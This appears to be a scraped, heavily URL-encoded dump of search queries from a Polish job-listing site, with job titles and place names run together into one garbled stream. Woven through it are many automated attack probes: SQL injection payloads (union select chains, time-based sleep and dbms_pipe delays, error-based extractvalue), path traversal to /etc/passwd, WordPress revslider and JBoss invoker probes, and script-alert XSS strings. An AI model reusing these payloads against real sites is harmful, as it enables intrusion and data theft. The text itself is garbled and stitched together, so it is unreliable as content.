szczecinsmart2staypracownik+budowlanki łódzkiemłodszy+specjalista+ds.+kadr+i+płacpraca%252bfizycznzspecjalista+ds.+kadr+i+rekrutacji+(m/k)mechanik+samochodowy+kierowca warszawaЛогистика+|+распределениеelektryk%252celektromonteropiekunka osób starszychbiłgorajreception %2cagient kklenta z j%c4%99zykiem angielskim mazowieckie.monter+konstrukcji/wp-login.php%27a%3d0/07545460.php+and+1%3d1pracownik inwentaryzacji za granic%c4%85specjalista ds. sprzedaży produktu premiummonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0'monter+konstrukcji/enterso.infoorzyszangielski+hiszpa%25252525c5%2525252584skispecjalista%2bds.%2bcz%252525252525c4%25252525252599%252525252525c5%2525252525259bci%2bzamiennychpraca bez znajomo%252525252525c5%2525252525259bci j%252525252525c4%25252525252599zyk niemcykierowca kat c%3bselect dbms_pipe.receive_message%28chr%28103%29%7c%7cchr%2880%29%7c%7cchr%2890%29%7c100technik elektryk %2525252525252528m/k%2525252525252529pracownik+myjni+samochodowej+%28m/k%29marketing %257c reklama %257c praaaaaaaain%c5%bcynieria+%7c+projektowanieaaaaaaaaspecjalista+ds.+planowania+jako%c5%9bci+%28m/k%29in%c5%bcynier budowy/wp-login.php and 1=1'and'l'='bmedycyna+%257c+%25d0%25a1%25d0%25a2%25d0%259e%25d0%259c%25d0%2590%25d0%25a2%25d0%259e%25d0%259b%25d0%259e%25d0%2593Логистика | распределение warszawadziale zakupówsierpcmonter+konstrukcji/wp-login.php'a=0/wp-admin'a=0%2525c5%25259blusarz bez jezyka niemcyspedytor międzynarodowyasystent/ka warszawapantostransport+%2525257c+spedycja'&&sleep(3)&&'1specjalista+ds.+obsługi+klienta gorzów+wielkopolskiorlen warszawapracownik+porz%252525c4%25252585dkowyoperator w%c3%b3zk%c3%b3w wid%c5%82owychpraca%2bbez%2bznajomo%25252525252525252525c5%252525252525252525259bci%2bj%25252525252525252525c4%2525252525252525252599zyka niemcypracownik oohrony warszawain%c5%bcynier wtrysku/etc/passwd%' union all select null,null,null,null-- wotnsprzeda%c5%bc+%7c+obs%c5%82uga+klienta legnicamonter+konstrukcji/wp-login.php%2525252527a%252525253d0/wp-admin/wp-admin/admin-ajax.php%253faction%253drevslider_show_imagetransport%2b%7c%2bspedycja%27a%3d0custome+serviceopiekunka+os%c3%b3b+starszychpracownik%2bdzia%2525c5%252582u%2bobs%2525c5%252582ugi%2bklientamonter statk%25c3%25b3woperator wózka widłowego'a=0 łódzkiefactory+work polandpracownik%2bprodukcji%2b%25252528m%2fk%25252529transport+|+spedycja"+and+"x"="y tychy/etc/passwd%' union all select null,null,null,null,null,null-- fmbvmonter konstrukcji/wp-login.php%27a%3d0/07545460.php and 1%3e1"and"h"="hpomoc%2bkucharzamagazynowy+(m/k) warszawaprodukcja dla niepełnosprawnych%' union all select null,null-- cydspraca fizyczna w rolnictwie szwajcariaopieka' and 'x'='ysap mm abap polandpracownik+sklepuniderlandzki warszawapracownik do sortowania owoc%2525252525c3%2525252525b3wwęgorzewolwówek+Śląskipracownik dzia%c5%82u administracjijunior+project+management polandjasieńochrona%252bos%25c3%25b3b%252bi%252bmieniakierownik-branża+betoniarskaspecjalista d/s importu -eksportu %252525252c obs%25252525c5%2525252582uga klienta %252525252c ar %2technik dentystyczny wrocławbudownictwo %2525257c geodezja pomocnikpraca%2b%2bfizyczna%2bbez%2bj%c4%99zykapraca+fizyczna+sprz%c4%85taczka opoledusznikia%252525252526jwarehouse/wp-login.php%2527a%253d0%2527a%253d0%27 and %27x%27%3d%27ypomocnik+%c5%9bmieciarza polskapowershellspecjalista%2bds.%2bsprzedadla nieletnich wołówjunior project managementwarehouse/wp-login.php'a=0'a=0' and 'x'='ytechnolog+%25c5%25bcywnosci mazowieckiedoradca+ds+nieruchomo%c5%9bci warszawapomoc%2bnauczycielssekretarka ze znajomo%c5%9bci%c4%85 j. niemieckiegomonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0 and 1>1atrakcyjne%2bpremiein%c5%bcynier+mechanikpracownik%252bprodukcji%252b%2528m/k%2529 niemcyoperator+w%25c3%25b3zk%25c3%25b3w+wid%25c5%2582owych szczecinoperator%2bw%252525c3%252525b3zka%2bwid%252525c5%25252582owego wielkopolskiepracownik+powierzchni+sprzedażąin%2525c5%2525bcynier+budowy/wp-login.php+and+1%3d1"and"x"="xpracownik%252bmonta%252525c5%252525bcuadministracja pa%25252525c5%2525252584stwowsap abap mmpracownik+działu+hr wrocławwarehouse/wp-login.php%252527a%25253d0%252527a%25253d0badania i rozw%252525c3%252525b3jjako%c5%9b%c4%87 opolekierowca c e wielkopolskiewarehouse/wp-login.php'a=0'a=0location=tychy99999" union select unhex(hex(version())) -- "x"="x'and'g'='zt%25c5%2582umacz+rosyjski/etc/passwd union all select null,null,null,null,null,null-- kbkspracownik+magazynu warszawatransport %257c spedycja%27 and %27x%27%3d%27xbłoniepraca+z+orzeczeniem+o+niepełnosprawności+kierowca+kat.bopalenicalogistics manager polskasekretarka ze znajomo%25c5%259bci%25c4%2585tester manualnyoperator%25252bw%25252525c3%25252525b3zk%25252525c3%25252525b3w%25252bwid%25252525c5%2525252582owych polskamanager %c5%82a%c5%84cucha dostawmonter podłóg niemcykontrola jakości częstochowaspecjalista d/s importu -eksportu %25252525252c obs%2525252525c5%252525252582uga klienta %25252525252c ar %25252525252c konsultakierowca++kat+c+union+all+select+null%2cnull%2cnull%2cnull--+hqnopomocnik%2b%2bw%2bagroturystyce polskamagazynier opolealuglass - realizacja piotr kalbarczyk" rlike (select (case when (2344=6191) then 0x616c75676c617373202d207265616c697a61636a6120miliczkierowca %2528m%252fk%2529 %2528kat. c e%252c hakowce%2529nauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam" and (select (case when (7020=7020) then null praca na 8godzin kobietapracownik obszaru produkcji %2528m/k%2529 podkarpackiep%25252525c5%2525252582atnos+cia+pilot+project+for+a+new+libertarian+floating+city+will+have+300+homes%2c+its+own+government%2c+and+its+own+cryptocurrencykancelariamonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0' and 'x'='y" and "x"="yplanista+produkcjiasystent/ka+ds.+ksi%25c4%2599gowosci wielkopolskiepracownik administracyjno-biurowy łódźkierowca%2bc%2bepraca+bez+znajomo%c5%9bci+j%c4%9praca%2bfizyczna zachodniopomorskieoperator%2bw%252525c3%252525b3zka%2bwid%252525c5%25252582owego%2b%25252528m/k%25252529sprzedaż | obsługa klienta wałbrzychmonter+konstrukcji/wp-login.php%2527a%253d0/wp-admin/admin-ajax.php%253faction%253drevslider_show_image%2527a%253d0sprzedawca, niania, operatorka linii produkcyjnejadministracja pa%c5%84skierownik+regionów warszawaadministracjq biurowa warszawatransport+%25257c+spedycja%252527a%25253d0 warszawaspecjalista%2bds.%2bobs%25252525c5%2525252582ugi%2bklientakierowca (m/k) (kat. c+e, hakowce) niemcyfrezer/programistamagazynier%25252525252cprodukcja%25252525252ckierowca+kat.bpraca wakacyjna - produkcjaopiekunka osób starszych kraków1 %25d0%25b7 154 %252cszuka pracy kierowcy c%252be pdw%25c3%25b3jna obsadainżynier jakości w dziale projektów wrocławkrasnej%25c4%2599zyk+francuski warszawapraca+bez+znajomo%252525c5%2525259bci+j%252525c4%25252599zyka niemcykierowca kat c and %2528select 3950 from%2528select count%2528%252a%2529%252cconcat%25280x71717a7071%252c%2528select %2528elt%2monter konstrukcji//wp-admin/admin-ajax.php?action=revolution-slider_show_imagebrzeg+dolnynauczyciel+j%c4%99zyk+niemiecki/login.action/invoker/jmxinvokerservletasystent/ka+ds.+księgowosci gdańskmonter+statk%2525c3%2525b3wpodw%2525c3%2525b3jna obsada kierowca c%25252bepracownik+powierzchni+sprzeda%c5%bcy/kasjer warszawadyrektor zak%c5%82adumalarz+szpachlarz niemcynauczyciel j%c4%99zyk niemiecki/login.action/invoker/jmxinvokerservlettapicermanager rejonu sprzedażysprzatanie w biurowcu wrocławpracownik%252bobszaru%252bprodukcji%252b%25252528m/k%25252529praca+fizyczna nowy+sączj%252525c4%25252599zykpracownik+magazynowy+-+18%2c29+z%c5%82+brutto/godz.+plus+premiepracownik biurowy bytomrawa+mazowieckakierowca kat c union all select 14,14,concat(concat('qqzpq','rudevmxtsj'),'qbbvq'),14,14,14,14-- quxypracownik umysłowy bytomit sta%252525c5%252525bcpraca+bez+znajomo%252525c5%2525259bci+j%252525c4%25252599zykapraca chałupniczapracownik%2bzielenimonter konstrukcji/wp-login.php%252527a%25253d0/wp-admin/wp-admin/admin-ajax.php%25253faction%25253drevslider show imageelektronik%2b%252525252528m/k%252525252529%2bw%2bzespole%2breklamacjisprzeda%2525c5%2525bc+%25257c+obs%2525c5%252582uga+klienta podkarpackiemonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_imagepracownik fizyczna zgierz,administracja biurowa radomprodukcja dla niepełnosprawnych union all select null,null,null,null,null,concat(0x7170627871,0x49776a5866414550624d,0x717a786apracownik produkcji p%25252525c5%2525252582o%25252525c5%2525252584skpracownik w gospodarstwie rolnymlogistyka | dystrybucja warszawa*nauczyciel+j%25c4%2599zyka+niemieckiegokierownik administracji mazowieckiekujawsko-+pomorskieholandia ślusarz narzędziowyin%2525c5%2525bcyniert%2525c5%252582umacz+j%2525c4%252599zyka+migowegopraca%2525252bfizyczna%2525252bw%2525252brolnictwie francjapracownik+montażu+(m/k)kierownik rob%2525c3%2525b3trecepcjonistka+medyczna warszawamagazynier %28m/k%29dla studenta wrocławpomocnik%252b%252bw%252bagroturystyceautomatyk wrocławpracownik+szklarni+z+og%c3%b3rkami/etc/passwd+union+all+select+null,null,null,null,null,null,null,null,null,null--+dkcbkierowca kat c union all select null,concat(concat('qqzpq','dhqtsdtnpm'),'qbbvq'),null,null,null,null,null-- kejsbez%20do%25c5%259bwiadczeniabez doświadczeniaasystent biurowykierowca%25252bw%25252bwypo%2525c5%2525bcyczalni%25252bsamochodowej%25252b%252528m%2fk%252529 niemcyspawacz+zbrojeń niemcycustomer+care wrocławasystent ds. ksi%c4%99gowoscistrzelce krajeńskiesprzeda%25c5%25bc+%257c+obs%25c5%2582uga+klienta kielcepraca biurowa, administracyjna gorzów wielkopolskispołecznej+odpowiedzialności polanddla nieletnichlogistyka %7c dystrybucja polandoperator%252bw%2525252525c3%2525252525b3zk%2525252525c3%2525252525b3w%252bwid%2525252525c5%25252in%2525c5%2525bcynier+jako%2525c5%25259bci+w+dziale+projekt%2525c3%2525b3wj%25252525c4%2525252599zyk%252bw%25252525c5%2525252582oskipracownik magazynowy - atrakcyjna stawka i bezpłatny dojazdlektor j. niemieckiego bytomkoordynator biura warszawalogistyka%2b%7c%2bdystrybucjathe%2binterface%2b%7c%2btour%2b%7c%2bidesktop.tvaluglass - realizacja piotr kalbarczyk" and 3791=cast((chr(113)||chr(106)||chr(120)||chr(98)||chr(113))||(select (case when (379transport+|+spedycja+and+1=1doradca techniczny %252528komponenty maszyn%252529 podkarpackiekierowca++kat+c%2527+union+all+select+null%252cnull%252cnull%252cnull%252cnull%252cnull--+gkmepracownik%252bprodukcji%252b-%252bpraca%252bod%252bzarazpracownik myjni samochodowej %28m/k%29 katowicepraca%25252bniemcy%25252bpraca%25252bfizyczna niemcynauczyciel j%c4%99zyk francuskipracownik magazynowy (m/k) wrocławkopiowanie, skanowanie Łódźprzemysł | produkcja mikołówpraca%2bpomocadministracja pa%25252525c5%2525252584stwowamonter+konstrukcji/wp-login.php%25252527a%2525253d0/07545460.php99999%25252522+union+select+unhex%25252528hex%25252528version%25mazowieckiealuglass+-+realizacja+piotr+kalbarczyk"+and+7510=3259+and+"ilhe"="ilhesprzedaż+|+obsługa+klienta krakówwykładanie towaru śląskiemontażysta+meblireferent ds. funduszy europejskich %2525252528m/k%2525252529kierowca kat c' union all select null,null,null,null,null,null,null,null-- ljqhkontrola jako%c5%9bci pomorskieopiekunka+osób+starszych warszawasprzeda%252525c5%252525bc %2525257c obs%252525c5%25252582uga klienta podkarpackieinżynieria | projektowanie gdańskkierowca++kat+c+union+all+select+14%2c14%2cconcat%28concat%28%27qqzpq%27%2c%27mzmbbqqcwyzwtpyipxvrsbyvelzlopnlpkcozhpe%27%29%2c%manager sprzeda%c5%bcypraca fizyczna budowlany poznańoperator%2bw%25252525c3%25252525b3zkanauczyciel j%25c4%2599zyk niemiecki/login.action/admin-console/github.com/joaomatosf/jexbossspecjalista ds. szkole%252525c5%25252584kadry+i+p%c5%82acemonter konstrukcji/wp-login.php'a=0pracownik%2525252bfkierowca++kat+c+union+all+select+null%2cnull%2cconcat%28concat%28%27qqzpq%27%2c%27gqxldvjcba%27%29%2c%27qbbvq%27%29%2cnull%2cnultransport%2b%2525257c%2bspedycja%25252522%2band%2b%25252522x%25252522%2525253d%25252522y%25252527a%2525253d0a%2525252526jkierownik zespo%2525c5%252582u programistycznegomagazynier Łódźpracownik+produkcji płońsk/transport+%7c+spedycja+and+1=1 tychyin%25c5%25bcynier+budowy/wp-login.php'+and+'x'='yopiekunka do dziecka wrocławliczenie towarunauczyciel j%c4%99zyk niemiecki/login.action/admin-console/github.com/joaomatosf/jexbosskierowca kat c union all select null%25252cnull-- tbxekonsultant+ds.+obs%252525252525c5%25252525252582ugi+klientamonter/ka+element%25c3%25b3w+do+siedze%25c5%2584+samochodowymonter+maszyn mazowieckietechnik elektryk %28m/k%29 szczecinmedia+|+sztuka+|+rozrywka poznańkobierzycepracownik%25252bpowierzchni%25252bsprzeda%252525c5%252525bcy/kasjeradministracja biurowa katowicejawornikpraca%2525252bbez%2525252bjezyka%2525252bmagazyn niemcykierowca kat c union all select null%252cnull%252cnull-- zdsqpracownik obs%25252525c5%2525252582gi lotniskajezyk+francuski polskatechnolog %252525c5%252525bcywnoscikierowca%252bb%252bbes%252bznajosci%252bjenzyka niemcypraca+wakacyjna+-+produkcjaspecjalista ds kar i p%25c5%2582ac wielkopolskiespecjalista ds. cz%2525252525c4%252525252599%2525252525c5%25252525259bci zamiennychpraca%25252bburowaprodukcja leków krakówpraca zakwterowaniem polskawarehouse/wp-login.php%252527a%25253d0%252527a%25253d0location%25253dtychy%252522+or+%2525281%25252c2%252529%25253d%252528selectksięgowa śląskiemonter p%c5%82ytmonter/ka+elementów+do+siedzeń+samochodowykładanie+towarunauczyciel+j%2525c4%252599zyk+niemiecki/login.action/web-console/web-console/invokerkonsultant ds. obsług klientakierowca %28m%2fk%29 %28kat. c e%2c hakowce%29kierrowca+kat+bkierowca kat c and %2528select 3950 from%2528select count%2528%252a%2529%252cconcat%25280x71717a7071%252c%252mechanik samochod%c3%b3w ci%c4%99%c5%bcarowychwarehouse/wp-login.php'a=0'a=0location=tychy99999" union select unhex(hex(version())) -- "x"="x"and"f"="rkierowca kat c warszawapraca%2bfizyczna szczecinpraca zdalna/operator wprowadzania danychbielsko bialafinansowykierownik+windykacji warszawajęzyk+francuskiin%252525c5%252525bcynier elektronik %25252528m/k%25252529 lublinmechanicy+pojazd%25c3%25b3w+ci%25c4%2599%25c5%25bcarowychmagazynier bielsko-bialawarehouse/wp-login.php%252527a%25253d0%252527a%25253d0location%25253dtychy2121121121212.1mechanicy pojazd%252525c3%252525b3w ci%252525c4%25252599%252525c5%252525bcarowychpraca+na+budowie+warszawa warszawaspecjalista ds. kadr i płac warszawakierowca%2525252bbes%2525252bznajosci%2525252bjenzykaasystent/ka+ds.+administracji+i+obs%2525c5%252582ugi+klienta warszawapraca%2bdla%2bpartransport+%7c+spedycja'+and+'x'='xspecjalista ds kadr i p%252525252525c5%25252525252582ackierowca++kat+c'+union+all+select+null,null,null,null,null,null,null,null,null,null--+tvlbspecjalista%2bds.%2bjako%c5%9bcioperator w%2525252525252525c3%2525252525252525b3zka wid%2525252525252525c5%252525252525252582owegogastronomia+%257c+cateringpraca+pomoc+księgowetarczynpomoc kuchenna mazowieckiemagazynier- praca na w%2525c3%2525b3zku wid%2525c5%252582owympracownik%2bpowierzchni%2bsprzeda%252525252525c5%252525252525bcy/kasjer/etc/passwd union all select null,null,null,null,null,null-- cnpzutrzymanie+ruchu śląskieoperator w%25252525c3%25252525b3zka widmagazynier/ka–+stawka+18,50+zł/brutto+premia!specjalista%2bds.%2btranskrypcjisprz%25252525c4%2525252585taczka w szkolespecjalista ds. ekspansjipracownik inwentaryzacji śląskiepracownik%2bmyjni%2bsamochodowej%2b%25252528m/k%25252529kierowca kat c union all select null,null,null,null,null,null,null,null-- lmmvnowy dwór mazowieckispecjalista ds. sprzedaży produktów bankowychsprzątaczka w szkole szczecinelektronik (m/k) w zespole reklamacji krakówpraca%2b8-16inżynier+robót warszawaprojektowanie+graficzmnezakupypracownik%252bmasprzedaż+|+obsługa+klienta warszawapraca%2bzdalna%2bdla%2bon-%2bwprowadzanie%2bdanychbiuro administracja ksi%2525c4%252599gowo%2525c5%25259b%2525c4%252587 j%2525c4%252599zyki warszawapraca fizyczna w rolnictwie niemcykierowca%252bw%252525c3%252525b3zka%252bwid%252525c5%25252582owego/etc/passwd union all select null,null-- kayhłódzkiekierowca w wypo%25252525252525c5%25252525252525bcyczalni samochodowej %2525252525252528m%252525252fk%2525252525252529t%25252525c5%2525252582umacz angielskiegobez+znajomo%25c5%259bci+j%25c4%2599zykastudent workc%2523'a=0pracownik magazynowy (m/k) katowice/etc/passwd' union all select null,null,null-- enwukontrola%25252bjako%252525c5%2525259bci polskapraca pomoc ksi%2525c4%252599gowejpalmirywyk%c5%82adanie+towaru+dni%c3%b3wkabez+do%25252525c5%252525259bwiadczeniamagazynier%252525252cprodukcja%252525252ckierowca kat.b%2527a%253d0m%25c5%2582odszy ksi%25c4%2599gowyextractvalue(1,concat(char(126),md5(1131055604)))produkcja+dla++niepełnosprawnych poznańj%2525c4%252599zyka hiszpa%2525c5%252584skiegodzia%2525c5%252582 obs%2525c5%252582ugi klientarussian polandlogistyka%2b%7c%2bdystrybucja sosnowiecrecepcjonista ka medyczna poznańpracownik%2bporz%252525252525c4%25252525252585dkowy%2b%25252525252528m/k%25252525252529sklep spożywczykonsultant telefoniczny łódźkierowca kat c union all select concat%28concat%28%27qqzpq%27%2c%27qiujvebkgo%27%29%2c%27qbbvq%27%29%kierowca kat c union all select 14%25252cconcat%252528concat%252528%252527qqzpq%252527%25252c%252527guotrpdkjnquteorboujxqudymlpracownik+do+sortowania+owoc%2525252525c3%2525252525b3wkierowca%2525252bw%2525252bwypo%25252525c5%25252525bcyczalni%2525252bsamochodowej%2525252b%2525252528m%252fk%2525252529księgowy wielkopolskiekrojczytechnik konsultant %252528m/k%252529monter+konstrukcji/wp-login.php%252527a%25253d0/wp-admin/admin-ajax.php%25253faction%25253drevslider_show_imagekierowca kat c union all select null,null-- tbxepraca burowa warszawapraca%2525252bfizyczna%2525252bw%2525252brolnictwiekonsultant+rprozne+stanowiskaпереводчик с украинскогоtransport%252b%25257c%252bspedycja%252527a%25253d0pomoc+kucharza warszawaoperator w%252525c3%252525b3zka wid%2525健身超模身材火辣+曲线让人喷血_纵览全球_战略网i'd+happily+take+a+1-point+win!+|+sport24przedstawiciel%25252bhandlowykierrowca kat b%25252527a%2525253d0mechanik%2bprzemys%252525c5%25252582owy/%2bmonterolsztynekspecjalista+d/s+importu+-eksportu+%2c+obs%c5%82uga+klienta+%2c+ar+%2c+konsultant+z+j%c4%99bobrownikipracownik produkcji %2528m%252fk%2529%28select %28case when %286881%3d6881%29 then 6881 else 6881%2a%28select 6881 from information_schema.plugins%29 end%29%29konsultant+telefoniczny+ds.+sprzedaży+produktów+bankowychprzemys%25c5%2582+%257c+produkcja mazowieckieatrakcyjne premiekontrola%25252bjako%252525252525252525c5%2525252525252525259bci polskapracownik+księgarnikierowca kat c%252527 union all select null%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull%25252ckierowca kat c%25%27 union all select null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull-- gylzpraca+fizyczna+sprzątaczka bytomkontrola jakości warszawapracownik porz%25252525c4%2525252585dkowynowy targ(select+(case+when+(6881=6881)+then+6881+else+6881*(select+6881+from+information_schema.plugins)+end))komponenty+maszynphoto editorpraca%2bbez%2bznajomo%2525c5%25259bci%2bj%2525c4%252599zykamonter+konstrukcji/wp-login.php%2527a%253d0/07545460.php+or+%25281%252c2%2529%253d%2528select%252afrom%2528select+name_const%252monter płyt gkmonter konstrukcji/wp-login.php<inputtype="image"src="javascript:alert('mysqlerror');">' or (1,2)=(select*from(select name_constbobolicemechanik przemys%252525c5%25252582owy/ monterbadania+i+rozw%252525c3%252525b3j szczecintechnolog %c5%bcywno%c5%9bcipraca z orzeczeniem krakówkierownik+rob%252525c3%252525b3t+sanitarnychdoradztwo%2b%25252525257c%2bkonsultingpraca fizyczna bez j%252525c4%25252599zyka niemcyjęzyka+hiszpańskiegokadr i płac warszawa../../../../../../etc/passwdpracownik+myjni+samochodowej+(m/k)cieśla szalunkowy francjamagazynier%25252cprodukcja%25252ckierowca+kat.b mazowieckieopiekunka do os%252525c3%252525b3b starszych w niemczech bez j%252525c4%25252599zyka niemcypracownik%2525252bprodukcji francjamonter+konstrukcji/wp-login.php'a=0/07545460.php'+and+'x'='xindustry%2b%7c%2bproductiontransport %2525257c spedycja' or (1,2)=(select*from(select name_const(char(118,119,71,122,80,103,104,118,87),1),name_const(char(portugaliakrzywaczkatechnik elektryk (m/k) szczecinpraca%2bfizyczna%2bsprz%2525c4%252585taczka sosnowiecsandomierzkierownik+ds.+bhppracownik ochrony pszczynapraca fizyczna lubuskieoperator w%2525252525c3%2525252525b3zk%2525252525c3%2525252525b3w wid%2525252525c5%252525252kierowca w wypo%25252525c5%25252525bcyczalni samochodowej %2525252528m%2fk%2525252529specjalista ds kar i p%25252525c5%2525252582acnauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam") rlike (select (case when (5414=4526) then 0xpraca+w+biurze+z+j%c4%99zykiem+ukrainskimpraca fizyczna bez j%2525252525252525c4%252525252525252599zyka niemcykierowca%25252bw%25252bwypo%2525252525c5%2525252525bcyczalni%25252bsamochodowej%25252b%252525252528m%2fk%252525252529malarz%252bszpachlarz francjaprotetyk+s%c5%82uchumonter konstrukcji/wp-login.php%3cbodyonload%3dalert%28%27mysqlerror%27%29%3e%27a%3d0in%2525c5%2525bcynier jako%2525c5%25259bciprodukcja dla niepe%c5%82nosprawnych union all select null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull-- jhghpracownik+dzia%c5%82u+w%c4%99dlinytechnolog %25c5%25bcywnoscisprzeda%c5%bc+%7c+obs%c5%82uga+klienta warszawapraca pomoc ksi%25c4%2599gowejkierowca+w%2525c3%2525b3zka+wid%2525c5%252582owegolider w dziale produktów dużej konsumpcji gdańskpracownik ochrony dobre miastopracownik%2bprodukcji%2bp%2525252525c5%252525252582o%2525252525c5%252525252584skpracownik+magazynowy+%252528m/k%252529 katowicepraca dla emeryta warszawatransport | spedycja'a=0 warszawaspecjalista+ds+kadr+i+płac wielkopolskakierowca%25252bw%25252bwypo%2525c5%2525bcyczalni%25252bsamochodowej%25252b%252528m/k%252529 niemcyredaktor+treści+marketingowych krakówtransport%2b%257c%2bspedycjamedia+%7c+sztuka+%7c+rozrywkagrafika %25257c fotografia %25257c kreacjaaaaaaaaain%2525c5%2525bcynier budowy pomorskiekierowca++kat+c%';select+dbms_pipe.receive_message(chr(103)||chr(80)||chr(90)||chr(76),5)+from+dual--gastronomia+|+catering wrocławasystent/ka ds. ksi%c4%99gowosci wielkopolskielogistyka %7c dystrybucja grodzisk mazowieckispecjalista ds. obs%252525c5%25252582ugi klienta-j. niemieckiin%c5%bcynier ds. utrzymania ruchunauczyciel j%25c4%2599zyk niemiecki/login.action/web-console/admin-console/login.seamпромышленность+|+производствоjakości śląskieinżynier śląskiekierowca c+e lub c1praca pracownicy wykonuj%25252525c4%2525252585cy prace prostepracownik produkcji %252525252528m/k%252525252529'a=0operator%2bsprzetu%2bbudowlanegoskładanie długopisówinżynier serwisuślusarz+spawaczmanicurzystkaprojektant/konstruktor/asystent+odzie%25c5%25bcyopiekunka do os%25c3%25b3b starszych w niemczech bez j%25c4%2599zykastore wrocławadministracja+biurowa krakówhr%252525252c kadrypracownik porz%2525c4%252585dkowy %252528m/k%252529wykładowca angielskiego śląskiepraca w niemczechprzedstawiciel+handlowy wielkopolskiejunior+front-end%27 warszawakontrola jako%25252525c5%252525259bci polskatransport | spedycja śląskiedo+sklepu warszawaПольшаpracownik szklarni z og%25c3%25b3rkami holandiaprawnik+j%2525c4%252599zyk+rosyjski(select (case when (5710=6699) then 'nauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam' else (sez+orzeczeniempracownik+ochrony pomorskiem%c5%82odszy+in%c5%bcynierprzemys%252525c5%25252582 %2525257c produkcja gliwiceedukacja %7c nauka %7c szkoleniaoperator w%c3%b3zka wid%c5%82owego 20%2c23part-time+teacherspecjalista ds. jakościдизайнерgeologoperator sp'a=0specjalista ds. obs%c5%82ugi klienta-j. niemieckispecjalista%2bds.%2brekrutacji%2bi%2bkadrtransport %2525257c spedycja and 1%25253d1piekarymonter+konstrukcji/wp-login.php%27a%3d0/07545460.php%27+and+%27x%27%3d%27x../../../../../../../etc/passwdtłumacz+rosyjskiego+i+angielskiegoj%c4%99zyk%2brosyjskikielce'produkcja+dla++niepełnosprawnych'+order+by+1/etc/passwd%25%27 union all select null%2cnull-- enqtpracownik produkcji %25252528m/k%25252529administracja pa%c5%84stwowakierowca wózka widłowego warszawamagazynier,produkcja,kierowca kat.b niemcycoordinator krakówkierowca+%2528m%2fk%2529+%2528kat.+c%252be%252c+hakowce%2529 niemcybankowy+doradca+klientamagazynier%2cprodukcja%2ckierowca kat.bpracownik%252bprodukcji%252b%2525252528m/k%2525252529praca+dla+ukrai%25c5%2584c%25c3%25b3wkorwek marcin f. h.u. eko-tech solki rajgr%c3%b3d barg%c5%82%c3%b3w ko%c5%9bcielny.konsultant+j%25252525c4%2525252599zyk+angielskinauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam") and 6055=(select count(*) from generate_seridębicakalisz pomorskikierowca%252bw%252bwypo%25c5%25bcyczalni%252bsamochodowej%252b%2528m/k%2529 niemcyserwis | technika | montaż śląskie%d0%be%d1%85%d1%80%d0%b0%d0%bd%d0%b0administracja biurowa warszawatechnik dentystyczny lublinspecjalista+ds.+kadr+i+płac wielkopolskielogistyka+|+dystrybucja wielkopolskiemonter+konstrukcji/wp-login.php%27a%3d0/wp-content/uploads/51217766.phpdoradca techniczny %28komponenty maszyn%29specjalista ds. planowania dostaw łódzkieprzemysł | produkcja trzebnicauk%c5%82adanie towaruoperator+w%2525c3%2525b3zka+wid%2525c5%252582owego niemcybudownictwo%252525252b%25252525257c%252525252bgeodezja francjapracownik biurowy płońskspecjalista ds. logistykijunior front end developer gdyniasedo+domain+parking+-+sedo+gmbhsucha beskidzka-6246' union all select 13,concat(0x7170627871,0x7368794d574f4d525258,0x717a786a71),13#rolnictwo %257c ochrona %25c5%259brodowiskaadministracja biurowa krakówlider+w+dziale+art.+przemys%c5%82owych zgorzelecmonter%252525252fka+element%25252525c3%25252525b3w+do+siedze%25252525c5%2525252584+samochodowychtester wrocławmonter konstrukcji/wp-login.php'a=0/07545460.php and 1=1specjalista%2bprpraca+burowa warszawapakowanie%2bnieletnibudownictwo%2525252525252b%25252525252525257c%2525252525252bgeodezja francjapraca fizyczna rzeszówpraca dla par niemcyt%2525c5%252582umacz+francuskiegospecjalista ds. obs%25c5%2582ugi klientaadministracja%2bpa%25252525c5%2525252584spracownik magazynowy %25252525252528m/k%25252525252529in%25252525c5%25252525bcynier budowy/wp-login.php%252522 or %2525281%25252c2%252529%25253d%252528select%25252afrom%252528select operator w%2525c3%2525b3zka wid%2525c5%252582owego brzegdrawsko+pomorskiepraca%2b%2bfizyczna%2bbez%2bj%252525252525c4%25252525252599zyka niemcypraca fizyczna spawacz gdańskdyrektor finansowypraca+bez+znajomo%25c5%259bci+j%25c4%2599zyk niemcykierowca w wypo%25252525c5%25252525bcyczalnioperator%252bw%252525252525c3%252525252525b3zk%252525252525c3%252525252525b3w%252bwid%252525252525c5%25252525252582owych polskapakowanie nieletni krakówregenersis/technikpraca bez znajomo%2525252525252525c5%25252525252525259bci j%2525252525252525c4%252525252525252599zykaasystent/ka+ds.+administracji+i+obs%2525c5%252582ugi+klienta+ze+znajomo%2525c5%25259bci%2525c4%252585+j%2525c4%252599zyka+ruskiemonter konstrukcji/wp-login.php%27produkcja dla niepe%c5%82nosprawnych' order by 1-- wcvxm%252525c5%25252582odszy+in%252525c5%252525bcynierpraca+fizyczadministracjia+biurowanaprodukcja dla niepełnosprawnych';select dbms_pipe.receive_message(chr(106)||chr(110)||chr(97)||chr(111),5) from dual--pracownik+magazynu+praca+dodatkowa łódzkieelektromechanik+pojazdów+samochodowychadministracja śląskieoperator%2bw%25c3%25b3zka%2bwid%25c5%2582owego wielkopolskiekierownik+uslug+porzadkowychprzemys%c5%82+%7c+produkcja gnieznopraca+pracownicy+wykonuj%25c4%2585cy+prace+prosteadministracja biurowa mazowieckiepracownik działu produkcjiprzemysł | produkcja niemcypracownik produkcji %252525252528m%252fk%252525252529/etc/passwd' union all select null,null,null,null,null,null,null,null-- xvcwkierowca kat c union all select concat%252528concat%252528%252527qqzpq%252527%25252c%252527qiujvebkgo%252527%252529%25252c%2525konsultant ds. wdro%2525c5%2525bce%2525c5%252584praca+fizyczna+sprz%c4%85taczka 